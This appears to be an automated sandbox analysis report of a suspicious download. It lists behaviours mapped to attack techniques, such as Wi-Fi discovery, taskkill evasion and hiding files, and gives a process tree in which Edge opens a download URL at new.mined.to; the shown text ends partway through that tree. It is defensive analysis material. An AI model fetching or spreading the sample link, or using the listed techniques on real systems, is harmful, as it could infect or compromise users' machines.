Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	updater.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
5556	127.0.6533.89_chrome_installer.exe
5312	setup.exe
2308	127.0.6533.89_chrome_installer.exe
2268	setup.exe

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 4 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
5396	cmd.exe
5724	netsh.exe
2332	cmd.exe
1844	netsh.exe

Detects videocard installed 1 TTPs 6 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2336	WMIC.exe
2468	WMIC.exe
5452	WMIC.exe
5728	WMIC.exe
5384	WMIC.exe
4036	WMIC.exe

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Gathers system information 1 TTPs 2 IoCs

Runs systeminfo.exe.

System Information Discovery

T1082

pid	Process
5476	systeminfo.exe
1028	systeminfo.exe

Kills process with taskkill 36 IoCs

evasion

pid	Process
1708	taskkill.exe
2068	taskkill.exe
5376	taskkill.exe
5128	taskkill.exe
3732	taskkill.exe
1008	taskkill.exe
1884	taskkill.exe
2496	taskkill.exe
5472	taskkill.exe
4036	taskkill.exe
5908	taskkill.exe
5844	taskkill.exe
5536	taskkill.exe
5088	taskkill.exe
5440	taskkill.exe
5404	taskkill.exe
2052	taskkill.exe
5284	taskkill.exe
5448	taskkill.exe
5268	taskkill.exe
5792	taskkill.exe
5800	taskkill.exe
464	taskkill.exe
6120	taskkill.exe
5984	taskkill.exe
4480	taskkill.exe
432	taskkill.exe
484	taskkill.exe
3064	taskkill.exe
5872	taskkill.exe
5996	taskkill.exe
5356	taskkill.exe
5432	taskkill.exe
5728	taskkill.exe
6116	taskkill.exe
5676	taskkill.exe

Modifies data under HKEY_USERS 8 IoCs

description	ioc	Process
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Google\Chrome\InstallerPinned = "0"	setup.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Google\Chrome	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Google	setup.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Google\Chrome\InstallerPinned = "0"	setup.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Google\Chrome	setup.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{1588C1A8-27D9-563E-9641-8D20767FB258}\ProxyStubClsid32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{C4622B28-A747-44C7-96AF-319BE5C3B261}\1.0	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\AppID	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{8A4B5D74-8832-5170-AB03-2415833EC703}\1.0	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\1.0\0\win64	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{B16B5A0E-3B72-5223-8DF0-9117CD64DE77}\1.0	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{8476CE12-AE1F-4198-805C-BA0F9B783F57}\ProxyStubClsid32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\1.0\0\win32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\CLSID\{A2C6CB58-C076-425C-ACB7-6D19D64428CD}	setup.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{6430040A-5EBD-4E63-A56F-C71D5990F827}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\TypeLib\Version = "1.0"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{128C2DA6-2BC0-44C0-B3F6-4EC22E647964}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5F793925-C903-4E92-9AE3-77CA5EAB1716}\1.0\0\win64\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{5F793925-C903-4E92-9AE3-77CA5EAB1716}\TypeLib\Version = "1.0"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{C4622B28-A747-44C7-96AF-319BE5C3B261}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{699F07AD-304C-5F71-A2DA-ABD765965B54}\TypeLib	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{247954F9-9EDC-4E68-8CC3-150C2B89EADF}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{DD42475D-6D46-496A-924E-BD5630B4CBBA}\ = "IAppBundleWeb"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}\TypeLib\ = "{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F4334319-8210-469B-8262-DD03623FEB5B}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\TypeLib	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{1588C1A8-27D9-563E-9641-8D20767FB258}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\1.0\0	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\TypeLib\Version = "1.0"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{ACAB122B-29C0-56A9-8145-AFA2F82A547C}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{F258BE54-7C5F-44A0-AAE0-730620A31D23}\1.0\0\win64	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{D106AB5F-A70E-400E-A21B-96208C1D8DBB}\1.0\0\win32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{0CD01D1E-4A1C-489D-93B9-9B6672877C57}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\TypeLib\ = "{F63F6F8B-ACD5-413C-A44B-0409136D26CB}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{0486745C-8D9B-5377-A54C-A61FFAA0BBE4}\TypeLib\Version = "1.0"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{6430040A-5EBD-4E63-A56F-C71D5990F827}\TypeLib	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{494B20CF-282E-4BDD-9F5D-B70CB09D351E}\ProxyStubClsid32	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{05A30352-EB25-45B6-8449-BCA7B0542CE5}\ProxyStubClsid32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{ABC01078-F197-4B0B-ADBC-CFE684B39C82}\AppID = "{ABC01078-F197-4B0B-ADBC-CFE684B39C82}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{699F07AD-304C-5F71-A2DA-ABD765965B54}\ = "IUpdaterAppStatesCallbackSystem"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}\1.0\0\win64	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{85AE4AE3-8530-516B-8BE4-A456BF2637D3}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}\ = "IAppWebSystem"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{B685B009-DBC4-4F24-9542-A162C3793E77}	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\TypeLib\ = "{27634814-8E41-4C35-8577-980134A96544}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{5F793925-C903-4E92-9AE3-77CA5EAB1716}\1.0\0\win32\ = "C:\\Program Files (x86)\\Google\\GoogleUpdater\\128.0.6597.0\\updater.exe\\6"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{85AE4AE3-8530-516B-8BE4-A456BF2637D3}\1.0\0\win64	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{B7FD5390-D593-5A8B-9AE2-23CE39822FD4}\ = "IUpdaterAppStateSystem"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{5F793925-C903-4E92-9AE3-77CA5EAB1716}\ProxyStubClsid32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{D576ED7F-31DA-4EE1-98CE-1F882FB3047A}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{18D0F672-18B4-48E6-AD36-6E6BF01DBBC4}\1.0\ = "GoogleUpdater TypeLib for IAppWeb"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{463ABECF-410D-407F-8AF5-0DF35A005CC8}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	setup.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\Interface\{F63F6F8B-ACD5-413C-A44B-0409136D26CB}\TypeLib	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{4DC034A8-4BFC-4D43-9250-914163356BB0}\1.0\0	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{513BC7DA-6B8D-45F7-90A0-2E9F66CEF962}\1.0\0	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{E9CD91E3-A00C-4B9E-BD63-7F34EB815D98}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\TypeLib\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\1.0\0\win32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{27634814-8E41-4C35-8577-980134A96544}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\GoogleUpdate.Update3WebMachine\CLSID\ = "{8A1D4361-2C08-4700-A351-3EAA9CBFF5E4}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{1F1289FD-DD10-4579-81F6-1C59AAF2E1A9}\ProxyStubClsid32	updater.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{F4FE76BC-62B9-49FC-972F-C81FC3A926DB}\ProxyStubClsid32\ = "{00020424-0000-0000-C000-000000000046}"	updater.exe
Key created	\REGISTRY\MACHINE\Software\Classes\WOW6432Node\Interface\{34527502-D3DB-4205-A69B-789B27EE0414}\ProxyStubClsid32	updater.exe

NTFS ADS 2 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\Downloads\Unconfirmed 210058.crdownload:SmartScreen	msedge.exe
File opened for modification	C:\Users\Admin\Downloads\Resource.exe:Zone.Identifier	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4412	msedge.exe
4412	msedge.exe
1888	msedge.exe
1888	msedge.exe
4288	msedge.exe
4288	msedge.exe
4528	identity_helper.exe
4528	identity_helper.exe
2452	msedge.exe
2452	msedge.exe
4376	powershell.exe
4376	powershell.exe
4704	powershell.exe
4704	powershell.exe
4624	powershell.exe
4624	powershell.exe
4376	powershell.exe
4704	powershell.exe
4624	powershell.exe
560	updater.exe
560	updater.exe
560	updater.exe
560	updater.exe
560	updater.exe
560	updater.exe
2244	updater.exe
2244	updater.exe
2244	updater.exe
2244	updater.exe
2244	updater.exe
2244	updater.exe
340	updater.exe
340	updater.exe
340	updater.exe
340	updater.exe
340	updater.exe
340	updater.exe
340	updater.exe
340	updater.exe
5380	powershell.exe
5380	powershell.exe
5684	powershell.exe
5684	powershell.exe
5380	powershell.exe
5684	powershell.exe
5540	powershell.exe
5540	powershell.exe
5540	powershell.exe
5896	powershell.exe
5896	powershell.exe
5896	powershell.exe
6096	powershell.exe
6096	powershell.exe
6096	powershell.exe
3464	powershell.exe
3464	powershell.exe
3464	powershell.exe
560	updater.exe
560	updater.exe
3180	chrome.exe
3180	chrome.exe
4112	powershell.exe
4112	powershell.exe
4628	powershell.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 15 IoCs

pid	Process
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4376	powershell.exe
Token: SeDebugPrivilege	3880	tasklist.exe
Token: SeDebugPrivilege	4704	powershell.exe
Token: SeDebugPrivilege	4624	powershell.exe
Token: SeIncreaseQuotaPrivilege	4840	WMIC.exe
Token: SeSecurityPrivilege	4840	WMIC.exe
Token: SeTakeOwnershipPrivilege	4840	WMIC.exe
Token: SeLoadDriverPrivilege	4840	WMIC.exe
Token: SeSystemProfilePrivilege	4840	WMIC.exe
Token: SeSystemtimePrivilege	4840	WMIC.exe
Token: SeProfSingleProcessPrivilege	4840	WMIC.exe
Token: SeIncBasePriorityPrivilege	4840	WMIC.exe
Token: SeCreatePagefilePrivilege	4840	WMIC.exe
Token: SeBackupPrivilege	4840	WMIC.exe
Token: SeRestorePrivilege	4840	WMIC.exe
Token: SeShutdownPrivilege	4840	WMIC.exe
Token: SeDebugPrivilege	4840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4840	WMIC.exe
Token: SeRemoteShutdownPrivilege	4840	WMIC.exe
Token: SeUndockPrivilege	4840	WMIC.exe
Token: SeManageVolumePrivilege	4840	WMIC.exe
Token: 33	4840	WMIC.exe
Token: 34	4840	WMIC.exe
Token: 35	4840	WMIC.exe
Token: 36	4840	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4840	WMIC.exe
Token: SeSecurityPrivilege	4840	WMIC.exe
Token: SeTakeOwnershipPrivilege	4840	WMIC.exe
Token: SeLoadDriverPrivilege	4840	WMIC.exe
Token: SeSystemProfilePrivilege	4840	WMIC.exe
Token: SeSystemtimePrivilege	4840	WMIC.exe
Token: SeProfSingleProcessPrivilege	4840	WMIC.exe
Token: SeIncBasePriorityPrivilege	4840	WMIC.exe
Token: SeCreatePagefilePrivilege	4840	WMIC.exe
Token: SeBackupPrivilege	4840	WMIC.exe
Token: SeRestorePrivilege	4840	WMIC.exe
Token: SeShutdownPrivilege	4840	WMIC.exe
Token: SeDebugPrivilege	4840	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4840	WMIC.exe
Token: SeRemoteShutdownPrivilege	4840	WMIC.exe
Token: SeUndockPrivilege	4840	WMIC.exe
Token: SeManageVolumePrivilege	4840	WMIC.exe
Token: 33	4840	WMIC.exe
Token: 34	4840	WMIC.exe
Token: 35	4840	WMIC.exe
Token: 36	4840	WMIC.exe
Token: 33	4672	bound.exe
Token: SeIncBasePriorityPrivilege	4672	bound.exe
Token: SeIncreaseQuotaPrivilege	2336	WMIC.exe
Token: SeSecurityPrivilege	2336	WMIC.exe
Token: SeTakeOwnershipPrivilege	2336	WMIC.exe
Token: SeLoadDriverPrivilege	2336	WMIC.exe
Token: SeSystemProfilePrivilege	2336	WMIC.exe
Token: SeSystemtimePrivilege	2336	WMIC.exe
Token: SeProfSingleProcessPrivilege	2336	WMIC.exe
Token: SeIncBasePriorityPrivilege	2336	WMIC.exe
Token: SeCreatePagefilePrivilege	2336	WMIC.exe
Token: SeBackupPrivilege	2336	WMIC.exe
Token: SeRestorePrivilege	2336	WMIC.exe
Token: SeShutdownPrivilege	2336	WMIC.exe
Token: SeDebugPrivilege	2336	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2336	WMIC.exe
Token: SeRemoteShutdownPrivilege	2336	WMIC.exe
Token: SeUndockPrivilege	2336	WMIC.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe

Suspicious use of SendNotifyMessage 36 IoCs

pid	Process
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
1888	msedge.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
3180	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe
5308	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
3008	MiniSearchHost.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1888 wrote to memory of 3392	1888	msedge.exe	80
PID 1888 wrote to memory of 3392	1888	msedge.exe	80
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 2068	1888	msedge.exe	82
PID 1888 wrote to memory of 4412	1888	msedge.exe	83
PID 1888 wrote to memory of 4412	1888	msedge.exe	83
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84
PID 1888 wrote to memory of 1812	1888	msedge.exe	84

Views/modifies file attributes 1 TTPs 4 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
6020	attrib.exe
1604	attrib.exe
5384	attrib.exe
2276	attrib.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://new.mined.to/resources/3/download
1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1888
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffd6bbd3cb8,0x7ffd6bbd3cc8,0x7ffd6bbd3cd8
  2⤵
  PID:3392
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1980 /prefetch:2
  2⤵
  PID:2068
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2100 /prefetch:3
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4412
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,6457387986166077859,2676017473858874429,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2768 /prefetch:8
  2⤵
  PID:1812
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
